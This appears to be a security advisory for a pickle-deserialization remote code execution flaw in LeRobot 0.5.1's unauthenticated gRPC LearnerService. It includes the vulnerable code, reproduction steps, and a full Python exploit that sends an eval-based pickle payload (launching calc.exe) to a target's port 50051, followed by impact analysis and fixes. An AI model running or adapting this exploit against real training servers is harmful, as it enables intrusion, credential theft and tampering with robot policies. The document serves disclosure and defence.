LeRobot - Version 0.5.1 / Remote Code Execution (RCE) via Insecure Deserialization based on sink pickle.loads and gRPC SendInteractions stream data in LearnerService
Below are one (1) way to reproduce RCE in LeRobot using a remote exploit controlled by an attacker (via web), without local intervention by a third party to modify files that allow code execution during the deserialization process.
For this PoC, two (2) different devices were used to simulate the interaction between an attacking machine (Raspberry Pi with IP 192.168.1.90) and a victim machine (Windows with IP 192.168.1.88).
Note: While this vulnerability is specifically verified and reported on version 0.5.1, other prior and subsequent versions may also be susceptible to this insecure deserialization vector.
Introduction
LeRobot is Hugging Face's open-source library for state-of-the-art Real-world Robotics. It provides models, datasets, and simulation environments designed to democratize access to robotics AI research, allowing researchers and developers to train policies on simulation environments and transfer them directly to physical robots.
A core component of distributed robotics learning architectures is the Learner node, which coordinates policy optimization across multiple physical robot clients (Actors). Safe design of transport pipelines is crucial for preventing host machine compromise and physical control hijacking.
Vulnerability description
The LearnerService in LeRobot v0.5.1 is part of the distributed HILSerl (Human-In-The-Loop Soft Actor-Critic) training architecture. It enables remote "Actors" (robot clients) to send episodic interaction data to a central "Learner" (server) for processing and model updates.
This service is exposed via gRPC on port 50051 by default and is completely unauthenticated. The SendInteractions method accepts a stream of data that is reassembled and then passed to an insecure pickle.load sink (bytes_to_python_object). An attacker can spoof an Actor instance and send a malicious serialized object, achieving Remote Code Execution (RCE) on the central training server.
The vulnerable code in lerobot/transport/utils.py (Sink):
def bytes_to_python_object(buffer: bytes) -> Any:
bytes_buffer = io.BytesIO(buffer)
bytes_buffer.seek(0)
obj = pickle.load(bytes_buffer) # nosec B301: Safe usage of pickle.load
# Add validation checks here
return obj
The vulnerable code in lerobot/rl/learner.py (Caller):
def process_interaction_message(
message, interaction_step_shift: int, wandb_logger: WandBLogger | None = None
):
"""Process a single interaction message with consistent handling."""
message = bytes_to_python_object(message)
Technical Impact Analysis
Project Purpose & Context
In distributed reinforcement learning, the Learner is the most critical infrastructure component, as it aggregates experience from multiple robots to update the global policy. The LearnerService facilitates this high-bandwidth data exchange, making it a natural but insecure entry point when deployed over network boundaries.
Platform & Deployment Environment
Typically deployed on high-performance Linux or Windows servers equipped with high-end GPUs. These servers are often exposed to a local research network where multiple robot clients (Actors) connect to stream training data during long-running experiments.
Comprehensive Risk Assessment
The risk is Critical. Compromise of the Learner allows an attacker to manipulate the learning process of multiple physical robots simultaneously. Additionally, the Learner environment often contains high-value assets such as proprietary reward functions, environment simulators, and cloud API keys (Hugging Face / WandB) stored for metrics logging and model checkpoints.
Attack Scenario
Who wants to exploit a particular vulnerability?
Adversaries targeting high-tech robotics firms, academic institutions conducting sensitive autonomous systems research, or any entity looking to compromise GPU-heavy infrastructure for lateral movement.
For what gain?
Intellectual property theft (policy architectures, trained weights), infrastructure hijacking (GPU compute resources), and the ability to inject backdoors into the learned behaviors of autonomous agents.
In what way?
By establishing a gRPC stream connection to the LearnerService (port 50051) and calling SendInteractions. The attacker sends a stream of bytes that, when reassembled by the victim, forms a malicious pickle object. The RCE is triggered as soon as the Learner's main loop processes the next message from its internal queue.
Reproduction steps
On Windows (victim) - IP 192.168.1.88
(.venv) PS L:\Deserializer\PYPI-lerobot> Get-NetIPAddress -AddressFamily IPv4 | Where-Object PrefixOrigin -eq "Dhcp" | Select-Object -ExpandProperty IPAddress
192.168.1.88
1. Create a .venv, activate it, and install the latest updated version (0.5.1) of LeRobot using pip install lerobot.
2. Additionally, it is necessary to install grpcio and protobuf to create a complete testing environment: pip install grpcio protobuf.
3. Create a file named train_config.json with the following content:
{
"job_name": "poc_hilserl",
"output_dir": "outputs/poc_hilserl",
"seed": 42,
"dataset": {
"repo_id": "lerobot/pusht"
},
"env": {
"type": "pusht",
"fps": 10
},
"wandb": {
"enable": false
},
"policy": {
"type": "sac",
"n_obs_steps": 1,
"push_to_hub": false,
"input_features": {
"observation.state": {
"type": "STATE",
"shape": [10]
}
},
"output_features": {
"action": {
"type": "ACTION",
"shape": [4]
}
},
"actor_learner_config": {
"learner_host": "0.0.0.0",
"learner_port": 50051
}
}
}
4. And then launch the Learner Service:
python -m lerobot.rl.learner --config_path train_config.json
On the Raspberry (attacker) - IP 192.168.1.90
kw0@kw0l4b:~ $ hostname -I | awk '{print $1}'
192.168.1.90
Create a file named exploit.py with the following content:
import grpc
import pickle
import os
import sys
import time
# Ensure lerobot modules are in path
from lerobot.transport import services_pb2, services_pb2_grpc
class RCE:
def __reduce__(self):
# Best Practice: Use 'eval' for self-containment and 'or {}'
# to ensure the unpickler returns a safe object type (dict).
return (eval, ("__import__('os').system('calc.exe') or {'Interaction step': 0}",))
def generate_messages(payload):
# The LearnerService.SendInteractions expects a stream of InteractionMessage
# It reassembles them using receive_bytes_in_chunks
# Send as one chunk for simplicity, or split if testing chunking
yield services_pb2.InteractionMessage(
transfer_state=services_pb2.TRANSFER_END, # Signals completion to trigger processing
data=payload
)
def exploit(target_ip="127.0.0.1", target_port=50051):
print(f"[*] Attacking LearnerService at {target_ip}:{target_port}...")
payload = pickle.dumps(RCE())
channel = grpc.insecure_channel(f"{target_ip}:{target_port}")
stub = services_pb2_grpc.LearnerServiceStub(channel)
print("[*] Initiating SendInteractions stream...")
try:
# Call the vulnerable streaming method
stub.SendInteractions(generate_messages(payload))
print("[+] Stream finished. Triggering processing...")
# We might need to wait a moment for the Learner main loop to pick it up from the queue
time.sleep(2)
print("[+] Check target for execution.")
except grpc.RpcError as e:
print(f"[!] gRPC Error: {e.details()}")
if __name__ == "__main__":
target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
exploit(target)
Run the exploit to trigger the RCE:
python exploit.py 192.168.1.88
And in the Windows victim machine:
Executive Summary: RCE via Insecure Pickle Deserialization in LeRobot LearnerService
The research identifies a critical Remote Code Execution (RCE) vulnerability in the LearnerService of LeRobot v0.5.1.
- Root Cause: The
LearnerServiceexposes an unauthenticated gRPCSendInteractionsmethod that reassembles stream data and passes it to an insecurepickle.loadsink (bytes_to_python_object). - Exploitation Mechanism: By establishing a gRPC connection to the default port (50051), an attacker can spoof an "Actor" node and transmit a crafted, malicious serialized object. The
Learnerservice automatically deserializes this payload upon arrival in the main processing loop, resulting in immediate code execution.
Analysis of Scope and Security Implications
This vulnerability is of critical severity, as it targets the core infrastructure of distributed robotic training systems.
1. Infection Scenarios
- Distributed Infrastructure Hijacking: In a typical HILSerl deployment, the
Learneracts as the central command node. An attacker who gains network access to theLearnerServiceport can execute arbitrary code on the high-performance GPU servers hosting the training process. - Robot-to-Server Pivot: If a single robotic client ("Actor") is compromised via other means, the attacker can use that node to propagate the exploit to the central
Learner, effectively poisoning the entire training pipeline.
2. Factors Exacerbating Risk
- Zero Authentication: The gRPC service operates without any authentication mechanisms, meaning any device on the network can interact with the
Learnerand trigger the vulnerable deserialization sink. - High-Value Target Environment: These systems often handle sensitive intellectual property, such as proprietary reward functions, trained model weights, and cloud provider credentials (e.g., Hugging Face, WandB) used for experiment logging, all of which are exposed to the attacker.
- Complex Dependencies: By compromising the
Learner, an attacker can inject backdoors directly into the policy architectures being learned by the robots, leading to long-term impact on autonomous agent behavior.
Conclusion and Recommendation
This is a critical-severity vulnerability. The combination of network-exposed gRPC streams and pickle-based deserialization creates a direct path for complete system compromise.
Suggested actions for the development team:
- Remove Pickle: Immediately replace
pickle.loadinbytes_to_python_objectwith a secure, non-executable data serialization format, such asProtobuformsgpack(with strict type validation). - Implement Authentication: Add mandatory authentication (e.g., mutual TLS or API keys) to the gRPC
SendInteractionsmethod to prevent unauthorized access. - Input Validation: If serialization must be complex, implement rigorous allow-listing and integrity signatures to ensure only data from trusted Actors is processed.